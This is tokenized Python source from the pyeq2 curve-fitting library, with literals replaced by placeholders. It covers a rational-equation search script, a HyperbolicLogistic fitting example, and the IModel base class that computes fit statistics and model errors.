numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , False ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> ( ) <EOL> print ( '<STR_LIT>' ) <EOL> equationCount = <NUM_LIT:0> <EOL> maxCoeffs = <NUM_LIT:3> <EOL> functionList = pyeq2 . PolyFunctions . GenerateListForRationals_2D ( ) <EOL> functionIndexList = range ( len ( functionList ) ) <EOL> for numeratorCoeffCount in range ( <NUM_LIT:1> , maxCoeffs ) : <EOL> numeratorComboList = UniqueCombinations ( functionIndexList , numeratorCoeffCount ) <EOL> for numeratorCombo in numeratorComboList : <EOL> for denominatorCoeffCount in range ( <NUM_LIT:1> , maxCoeffs ) : <EOL> denominatorComboList = UniqueCombinations2 ( functionIndexList , denominatorCoeffCount ) <EOL> for denominatorCombo in denominatorComboList : <EOL> for extendedVersion in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> extraCoeffs = <NUM_LIT:0> <EOL> if extendedVersion == '<STR_LIT>' : <EOL> extraCoeffs = <NUM_LIT:1> <EOL> if ( len ( numeratorCombo ) + len ( denominatorCombo ) + extraCoeffs ) > smoothnessControl : <EOL> continue <EOL> equationInstance = pyeq2 . Models_2D . Rational . UserSelectableRational ( fittingTargetText , extendedVersion , numeratorCombo , denominatorCombo , functionList ) <EOL> equationInstance . dataCache = externalCache <EOL> if equationInstance . dataCache . allDataCacheDictionary == { } : <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equationInstance , False ) <EOL> equationInstance . dataCache . CalculateNumberOfReducedDataPoints ( equationInstance ) <EOL> if reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> equationInstance . dataCache . 
reducedDataCacheDictionary = reducedDataCache [ equationInstance . numberOfReducedDataPoints ] <EOL> else : <EOL> equationInstance . dataCache . reducedDataCacheDictionary = { } <EOL> SetParametersAndFit ( equationInstance , resultList , False ) <EOL> if not reducedDataCache . has_key ( equationInstance . numberOfReducedDataPoints ) : <EOL> reducedDataCache [ equationInstance . numberOfReducedDataPoints ] = equationInstance . dataCache . reducedDataCacheDictionary <EOL> equationCount += <NUM_LIT:1> <EOL> if ( equationCount % <NUM_LIT:5> ) == <NUM_LIT:0> : <EOL> print ( '<STR_LIT:U+0020>' , equationCount , '<STR_LIT>' , equationInstance . rationalNumeratorFlags , equationInstance . rationalDenominatorFlags , ) <EOL> if extendedVersion == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( ) <EOL> resultList . sort ( key = lambda item : item [ <NUM_LIT:3> ] ) <EOL> bestResult = resultList [ <NUM_LIT:0> ] <EOL> print ( ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' + str ( smoothnessControl ) + '<STR_LIT>' ) <EOL> moduleName = bestResult [ <NUM_LIT:0> ] <EOL> className = bestResult [ <NUM_LIT:1> ] <EOL> extendedVersionHandlerName = bestResult [ <NUM_LIT:2> ] <EOL> fittingTarget = bestResult [ <NUM_LIT:3> ] <EOL> solvedCoefficients = bestResult [ <NUM_LIT:4> ] <EOL> polyfunctional2DFlags = bestResult [ <NUM_LIT:5> ] <EOL> polynomialOrderX = bestResult [ <NUM_LIT:6> ] <EOL> rationalNumeratorFlags = bestResult [ <NUM_LIT:7> ] <EOL> rationalDenominatorFlags = bestResult [ <NUM_LIT:8> ] <EOL> if polyfunctional2DFlags : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + "<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" + str ( polyfunctional2DFlags ) + "<STR_LIT:)>" ) <EOL> elif polynomialOrderX != None : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + 
"<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" + str ( polynomialOrderX ) + "<STR_LIT:U+002CU+0020>" + str ( polynomialOrderY ) + "<STR_LIT:)>" ) <EOL> elif rationalNumeratorFlags and rationalDenominatorFlags : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + "<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" + str ( rationalNumeratorFlags ) + "<STR_LIT:U+002CU+0020>" + str ( rationalDenominatorFlags ) + "<STR_LIT:)>" ) <EOL> else : <EOL> equation = eval ( moduleName + "<STR_LIT:.>" + className + "<STR_LIT>" + fittingTargetText + "<STR_LIT>" + extendedVersionHandlerName + "<STR_LIT>" ) <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( rawData , equation , False ) <EOL> equation . fittingTarget = fittingTargetText <EOL> equation . solvedCoefficients = solvedCoefficients <EOL> equation . dataCache . FindOrCreateAllDataCache ( equation ) <EOL> equation . CalculateModelErrors ( equation . solvedCoefficients , equation . dataCache . allDataCacheDictionary ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' , moduleName + "<STR_LIT:.>" + className ) <EOL> print ( '<STR_LIT>' , equation . fittingTarget + "<STR_LIT::>" , equation . CalculateAllDataFittingTarget ( equation . solvedCoefficients ) ) <EOL> if polyfunctional2DFlags : <EOL> print ( ) <EOL> print ( '<STR_LIT>' , polyfunctional2DFlags ) <EOL> print ( ) <EOL> if polynomialOrderX != None : <EOL> ( ) <EOL> print ( '<STR_LIT>' , polynomialOrderX ) <EOL> print ( ) <EOL> if rationalNumeratorFlags and rationalDenominatorFlags : <EOL> print ( ) <EOL> print ( '<STR_LIT>' , rationalNumeratorFlags ) <EOL> print ( '<STR_LIT>' , rationalDenominatorFlags ) <EOL> if extendedVersionHandlerName == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' ) <EOL> print ( ) <EOL> for i in range ( len ( equation . solvedCoefficients ) ) : <EOL> print ( "<STR_LIT>" + equation . GetCoefficientDesignators ( ) [ i ] + "<STR_LIT>" + str ( equation . 
solvedCoefficients [ i ] ) ) <EOL> print ( ) <EOL> for i in range ( len ( equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) : <EOL> print ( '<STR_LIT>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ i ] , ) <EOL> print ( '<STR_LIT:Y>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPredictions [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelAbsoluteError [ i ] , ) <EOL> if not equation . dataCache . DependentDataContainsZeroFlag : <EOL> print ( '<STR_LIT>' , equation . modelRelativeError [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPercentError [ i ] ) <EOL> else : <EOL> print ( ) </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> import os , sys , inspect <EOL> if - <NUM_LIT:1> != sys . path [ <NUM_LIT:0> ] . find ( '<STR_LIT>' ) : raise Exception ( '<STR_LIT>' ) <EOL> importDir = os . path . join ( os . path . join ( sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] , '<STR_LIT:..>' ) , '<STR_LIT:..>' ) <EOL> if importDir not in sys . path : <EOL> sys . path . append ( importDir ) <EOL> import pyeq2 <EOL> equation = pyeq2 . Models_2D . BioScience . HyperbolicLogistic ( ) <EOL> data = equation . exampleData <EOL> pyeq2 . dataConvertorService ( ) . ConvertAndSortColumnarASCII ( data , equation , False ) <EOL> equation . Solve ( ) <EOL> print ( "<STR_LIT>" , equation . GetDisplayName ( ) , str ( equation . GetDimensionality ( ) ) + "<STR_LIT:D>" ) <EOL> print ( "<STR_LIT>" , equation . fittingTargetDictionary [ equation . fittingTarget ] , '<STR_LIT:=>' , equation . CalculateAllDataFittingTarget ( equation . solvedCoefficients ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i in range ( len ( equation . solvedCoefficients ) ) : <EOL> print ( "<STR_LIT>" % ( equation . GetCoefficientDesignators ( ) [ i ] , equation . solvedCoefficients [ i ] ) ) <EOL> equation . CalculateModelErrors ( equation . solvedCoefficients , equation . dataCache . allDataCacheDictionary ) <EOL> print ( ) <EOL> for i in range ( len ( equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) : <EOL> print ( '<STR_LIT>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPredictions [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelAbsoluteError [ i ] , ) <EOL> if not equation . dataCache . DependentDataContainsZeroFlag : <EOL> print ( '<STR_LIT>' , equation . 
modelRelativeError [ i ] , ) <EOL> print ( '<STR_LIT>' , equation . modelPercentError [ i ] ) <EOL> else : <EOL> print ( ) <EOL> print ( ) <EOL> equation . CalculateCoefficientAndFitStatistics ( ) <EOL> if equation . upperCoefficientBounds or equation . lowerCoefficientBounds : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' , equation . df_e ) <EOL> print ( '<STR_LIT>' , equation . df_r ) <EOL> if equation . rmse == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . rmse ) <EOL> if equation . r2 == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . r2 ) <EOL> if equation . r2adj == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . r2adj ) <EOL> if equation . Fstat == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . Fstat ) <EOL> if equation . Fpv == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . Fpv ) <EOL> if equation . ll == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . ll ) <EOL> if equation . aic == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . aic ) <EOL> if equation . bic == None : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' , equation . bic ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> for i in range ( len ( equation . solvedCoefficients ) ) : <EOL> if equation . tstat_beta == None : <EOL> tstat = '<STR_LIT>' <EOL> else : <EOL> tstat = '<STR_LIT>' % ( equation . tstat_beta [ i ] ) <EOL> if equation . pstat_beta == None : <EOL> pstat = '<STR_LIT>' <EOL> else : <EOL> pstat = '<STR_LIT>' % ( equation . pstat_beta [ i ] ) <EOL> if equation . sd_beta != None : <EOL> print ( "<STR_LIT>" % ( equation . GetCoefficientDesignators ( ) [ i ] , equation . solvedCoefficients [ i ] , equation . 
sd_beta [ i ] ) ) <EOL> else : <EOL> print ( "<STR_LIT>" % ( equation . GetCoefficientDesignators ( ) [ i ] , equation . solvedCoefficients [ i ] ) ) <EOL> print ( "<STR_LIT>" % ( tstat , pstat , equation . ci [ i ] [ <NUM_LIT:0> ] , equation . ci [ i ] [ <NUM_LIT:1> ] ) ) <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> for i in equation . cov_beta : <EOL> print ( i ) <EOL> print ( ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( pyeq2 . outputSourceCodeService ( ) . GetOutputSourceCodeJAVA ( equation ) ) </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> import pyeq2 <EOL> import numpy <EOL> try : <EOL> import scipy . interpolate , scipy . stats <EOL> except : <EOL> pass <EOL> numpy . seterr ( all = '<STR_LIT:ignore>' ) <EOL> class IModel ( object ) : <EOL> splineFlag = False <EOL> userSelectablePolynomialFlag = False <EOL> userCustomizablePolynomialFlag = False <EOL> userSelectablePolyfunctionalFlag = False <EOL> userSelectableRationalFlag = False <EOL> userDefinedFunctionFlag = False <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> independentData1CannotContainBothPositiveAndNegativeFlag = False <EOL> independentData2CannotContainBothPositiveAndNegativeFlag = False <EOL> listOfAdditionalCoefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:m>' , '<STR_LIT:n>' , '<STR_LIT:p>' , '<STR_LIT:q>' , '<STR_LIT:r>' , '<STR_LIT:s>' , '<STR_LIT:t>' , '<STR_LIT:u>' , '<STR_LIT:v>' , '<STR_LIT:w>' , '<STR_LIT:z>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> fittingTargetDictionary = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def __init__ ( self , inFittingTarget = '<STR_LIT>' , inExtendedVersionName = '<STR_LIT>' ) : <EOL> if inExtendedVersionName == '<STR_LIT>' : <EOL> inExtendedVersionName = '<STR_LIT>' <EOL> if inFittingTarget not in list ( self . fittingTargetDictionary . keys ( ) ) : <EOL> raise Exception ( str ( inFittingTarget ) + '<STR_LIT>' ) <EOL> self . fittingTarget = inFittingTarget <EOL> inExtendedVersionName = inExtendedVersionName . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> if inExtendedVersionName not in pyeq2 . ExtendedVersionHandlers . extendedVersionHandlerNameList : <EOL> raise Exception ( inExtendedVersionName + '<STR_LIT>' ) <EOL> allowedExtendedVersion = True <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateOffsetForm == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateReciprocalForm == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateInverseForms == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateGrowthAndDecayForms == False ) : <EOL> allowedExtendedVersion = False <EOL> if ( - <NUM_LIT:1> != inExtendedVersionName . find ( '<STR_LIT>' ) ) and ( self . autoGenerateGrowthAndDecayForms == False ) : <EOL> allowedExtendedVersion = False <EOL> if allowedExtendedVersion == False : <EOL> raise Exception ( '<STR_LIT>' + inExtendedVersionName + '<STR_LIT>' ) <EOL> self . extendedVersionHandler = eval ( '<STR_LIT>' + inExtendedVersionName + '<STR_LIT>' + inExtendedVersionName + '<STR_LIT>' ) <EOL> self . dataCache = pyeq2 . dataCache ( ) <EOL> self . upperCoefficientBounds = [ ] <EOL> self . 
lowerCoefficientBounds = [ ] <EOL> self . estimatedCoefficients = [ ] <EOL> self . fixedCoefficients = [ ] <EOL> self . solvedCoefficients = [ ] <EOL> self . polyfunctional2DFlags = [ ] <EOL> self . polyfunctional3DFlags = [ ] <EOL> self . xPolynomialOrder = None <EOL> self . yPolynomialOrder = None <EOL> self . rationalNumeratorFlags = [ ] <EOL> self . rationalDenominatorFlags = [ ] <EOL> self . deEstimatedCoefficients = [ ] <EOL> try : <EOL> if self . _dimensionality == <NUM_LIT:2> : <EOL> self . exampleData = '''<STR_LIT>''' <EOL> else : <EOL> self . exampleData = '''<STR_LIT>''' <EOL> except : <EOL> pass <EOL> def CalculateCoefficientAndFitStatistics ( self ) : <EOL> self . nobs = len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> self . ncoef = len ( self . solvedCoefficients ) <EOL> self . df_e = self . nobs - self . ncoef <EOL> self . df_r = self . ncoef - <NUM_LIT:1> <EOL> self . sumOfSquaredErrors = numpy . sum ( self . modelAbsoluteError * self . modelAbsoluteError ) <EOL> upperCoefficientBounds = self . upperCoefficientBounds <EOL> lowerCoefficientBounds = self . lowerCoefficientBounds <EOL> fixedCoefficients = self . fixedCoefficients <EOL> self . upperCoefficientBounds = [ ] <EOL> self . lowerCoefficientBounds = [ ] <EOL> self . fixedCoefficients = [ ] <EOL> try : <EOL> self . r2 = <NUM_LIT:1.0> - self . modelAbsoluteError . var ( ) / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] . var ( ) <EOL> if self . r2 < <NUM_LIT:0.0> : <EOL> self . r2 = None <EOL> except : <EOL> self . r2 = None <EOL> try : <EOL> self . rmse = numpy . sqrt ( self . sumOfSquaredErrors / self . nobs ) <EOL> except : <EOL> self . rmse = None <EOL> try : <EOL> self . r2adj = <NUM_LIT:1.0> - ( <NUM_LIT:1.0> - self . r2 ) * ( ( self . nobs - <NUM_LIT:1.0> ) / ( self . nobs - self . ncoef ) ) <EOL> except : <EOL> self . r2adj = None <EOL> try : <EOL> self . Fstat = ( self . r2 / self . df_r ) / ( ( <NUM_LIT:1.0> - self . r2 ) / self . 
df_e ) <EOL> except : <EOL> self . Fstat = None <EOL> try : <EOL> self . Fpv = <NUM_LIT:1.0> - scipy . stats . f . cdf ( self . Fstat , self . df_r , self . df_e ) <EOL> except : <EOL> self . Fpv = None <EOL> try : <EOL> self . ll = - ( self . nobs * <NUM_LIT:0.5> ) * ( <NUM_LIT:1.0> + numpy . log ( <NUM_LIT> * numpy . pi ) ) - ( self . nobs * <NUM_LIT:0.5> ) * numpy . log ( numpy . dot ( self . modelAbsoluteError , self . modelAbsoluteError ) / self . nobs ) <EOL> except : <EOL> self . ll = None <EOL> try : <EOL> self . aic = - <NUM_LIT> * self . ll / self . nobs + ( <NUM_LIT> * self . ncoef / self . nobs ) <EOL> except : <EOL> self . aic = None <EOL> try : <EOL> self . bic = - <NUM_LIT> * self . ll / self . nobs + ( self . ncoef * numpy . log ( self . nobs ) ) / self . nobs <EOL> except : <EOL> self . bic = None <EOL> if self . splineFlag == True : <EOL> self . cov_beta = None <EOL> self . sd_beta = None <EOL> self . tstat_beta = None <EOL> self . pstat_beta = None <EOL> self . ci = None <EOL> return <EOL> else : <EOL> model = scipy . odr . odrpack . Model ( self . WrapperForODR ) <EOL> self . dataCache . FindOrCreateAllDataCache ( self ) <EOL> data = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> myodr = scipy . odr . odrpack . ODR ( data , model , beta0 = self . solvedCoefficients , maxit = <NUM_LIT:0> ) <EOL> myodr . set_job ( fit_type = <NUM_LIT:2> ) <EOL> parameterStatistics = myodr . run ( ) <EOL> self . cov_beta = parameterStatistics . cov_beta <EOL> try : <EOL> self . sd_beta = parameterStatistics . sd_beta * parameterStatistics . sd_beta <EOL> except : <EOL> self . sd_beta = None <EOL> self . ci = [ ] <EOL> t_df = scipy . stats . t . ppf ( <NUM_LIT> , self . df_e ) <EOL> for i in range ( len ( self . solvedCoefficients ) ) : <EOL> self . ci . append ( [ self . solvedCoefficients [ i ] - t_df * parameterStatistics . sd_beta [ i ] , self . 
solvedCoefficients [ i ] + t_df * parameterStatistics . sd_beta [ i ] ] ) <EOL> try : <EOL> self . tstat_beta = self . solvedCoefficients / parameterStatistics . sd_beta <EOL> except : <EOL> self . tstat_beta = None <EOL> try : <EOL> self . pstat_beta = ( <NUM_LIT:1.0> - scipy . stats . t . cdf ( numpy . abs ( self . tstat_beta ) , self . df_e ) ) * <NUM_LIT> <EOL> except : <EOL> self . pstat_beta = None <EOL> if len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> self . nobs_weighted = len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> self . ncoef_weighted = len ( self . solvedCoefficients ) <EOL> self . df_e_weighted = self . nobs - self . ncoef <EOL> self . df_r_weighted = self . ncoef - <NUM_LIT:1> <EOL> absoluteErrorWeighted = self . modelAbsoluteError * self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> self . sumOfSquaredErrors_weighted = numpy . sum ( absoluteErrorWeighted * absoluteErrorWeighted ) <EOL> try : <EOL> self . r2_weighted = <NUM_LIT:1.0> - absoluteErrorWeighted . var ( ) / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] . var ( ) <EOL> except : <EOL> self . r2_weighted = None <EOL> try : <EOL> self . rmse_weighted = numpy . sqrt ( self . sumOfSquaredErrors_weighted / self . nobs_weighted ) <EOL> except : <EOL> self . rmse_weighted = None <EOL> try : <EOL> self . r2adj_weighted = <NUM_LIT:1.0> - ( <NUM_LIT:1.0> - self . r2_weighted ) * ( ( self . nobs_weighted - <NUM_LIT:1.0> ) / ( self . nobs_weighted - self . ncoef_weighted ) ) <EOL> except : <EOL> self . r2adj_weighted = None <EOL> try : <EOL> self . Fstat_weighted = ( self . r2_weighted / self . df_r_weighted ) / ( ( <NUM_LIT:1.0> - self . r2_weighted ) / self . df_e_weighted ) <EOL> except : <EOL> self . Fstat_weighted = None <EOL> try : <EOL> self . Fpv_weighted = <NUM_LIT:1.0> - scipy . stats . f . cdf ( self . Fstat_weighted , self . df_r_weighted , self . df_e_weighted ) <EOL> except : <EOL> self . 
Fpv_weighted = None <EOL> try : <EOL> self . ll_weighted = - ( self . nobs_weighted * <NUM_LIT:0.5> ) * ( <NUM_LIT:1.0> + numpy . log ( <NUM_LIT> * numpy . pi ) ) - ( self . nobs_weighted * <NUM_LIT:0.5> ) * numpy . log ( numpy . dot ( absoluteErrorWeighted , absoluteErrorWeighted ) / self . nobs_weighted ) <EOL> except : <EOL> self . ll_weighted = None <EOL> try : <EOL> self . aic_weighted = - <NUM_LIT> * self . ll_weighted / self . nobs_weighted + ( <NUM_LIT> * self . ncoef_weighted / self . nobs_weighted ) <EOL> except : <EOL> self . aic_weighted = None <EOL> try : <EOL> self . bic_weighted = - <NUM_LIT> * self . ll_weighted / self . nobs_weighted + ( self . ncoef_weighted * numpy . log ( self . nobs_weighted ) ) / self . nobs_weighted <EOL> except : <EOL> self . bic_weighted = None <EOL> if self . splineFlag == True : <EOL> self . cov_beta_weighted = None <EOL> self . sd_beta_weighted = None <EOL> self . tstat_beta_weighted = None <EOL> self . pstat_beta_weighted = None <EOL> self . ci_weighted = None <EOL> return <EOL> else : <EOL> model_weighted = scipy . odr . odrpack . Model ( self . WrapperForODR ) <EOL> self . dataCache . FindOrCreateAllDataCache ( self ) <EOL> data_weighted = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> myodr_weighted = scipy . odr . odrpack . ODR ( data_weighted , model_weighted , beta0 = self . solvedCoefficients , maxit = <NUM_LIT:0> ) <EOL> myodr_weighted . set_job ( fit_type = <NUM_LIT:2> ) <EOL> parameterStatistics_weighted = myodr_weighted . run ( ) <EOL> self . cov_beta_weighted = parameterStatistics . cov_beta <EOL> try : <EOL> self . sd_beta_weighted = parameterStatistics_weighted . sd_beta * parameterStatistics_weighted . sd_beta <EOL> except : <EOL> self . sd_beta_weighted = None <EOL> self . ci_weighted = [ ] <EOL> t_df_weighted = scipy . stats . t . 
ppf ( <NUM_LIT> , self . df_e_weighted ) <EOL> for i in range ( len ( self . solvedCoefficients ) ) : <EOL> self . ci_weighted . append ( [ self . solvedCoefficients [ i ] - t_df_weighted * parameterStatistics_weighted . sd_beta [ i ] , self . solvedCoefficients [ i ] + t_df_weighted * parameterStatistics_weighted . sd_beta [ i ] ] ) <EOL> try : <EOL> self . tstat_beta_weighted = self . solvedCoefficients / parameterStatistics_weighted . sd_beta <EOL> except : <EOL> self . tstat_beta_weighted = None <EOL> try : <EOL> self . pstat_beta_weighted = ( <NUM_LIT:1.0> - scipy . stats . t . cdf ( numpy . abs ( self . tstat_beta_weighted ) , self . df_e_weighted ) ) * <NUM_LIT> <EOL> except : <EOL> self . pstat_beta_weighted = None <EOL> else : <EOL> self . nobs_weighted = None <EOL> self . ncoef_weighted = None <EOL> self . df_e_weighted = None <EOL> self . df_r_weighted = None <EOL> self . sumOfSquaredErrors_weighted = None <EOL> self . r2_weighted = None <EOL> self . rmse_weighted = None <EOL> self . r2adj_weighted = None <EOL> self . Fstat_weighted = None <EOL> self . Fpv_weighted = None <EOL> self . ll_weighted = None <EOL> self . aic_weighted = None <EOL> self . bic_weighted = None <EOL> self . cov_beta_weighted = None <EOL> self . sd_beta_weighted = None <EOL> self . tstat_beta_weighted = None <EOL> self . pstat_beta_weighted = None <EOL> self . ci_weighted = None <EOL> self . upperCoefficientBounds = upperCoefficientBounds <EOL> self . lowerCoefficientBounds = lowerCoefficientBounds <EOL> self . fixedCoefficients = fixedCoefficients <EOL> def CalculateModelErrors ( self , inCoeffs , inDictionary ) : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . 
lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> self . modelPredictions = self . CalculateModelPredictions ( inCoeffs , inDictionary ) <EOL> self . modelAbsoluteError = self . modelPredictions - inDictionary [ '<STR_LIT>' ] <EOL> try : <EOL> if self . dataCache . DependentDataContainsZeroFlag == False : <EOL> self . modelRelativeError = self . modelAbsoluteError / inDictionary [ '<STR_LIT>' ] <EOL> self . modelPercentError = self . modelRelativeError * <NUM_LIT> <EOL> except : <EOL> self . dataCache . DependentDataContainsZeroFlag = True <EOL> self . modelRelativeError = [ ] <EOL> self . modelPercentError = [ ] <EOL> def CalculateReducedDataFittingTarget ( self , inCoeffs ) : <EOL> if not self . AreCoefficientsWithinBounds ( inCoeffs ) : <EOL> try : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> except : <EOL> pass <EOL> try : <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> error = self . CalculateModelPredictions ( inCoeffs , self . 
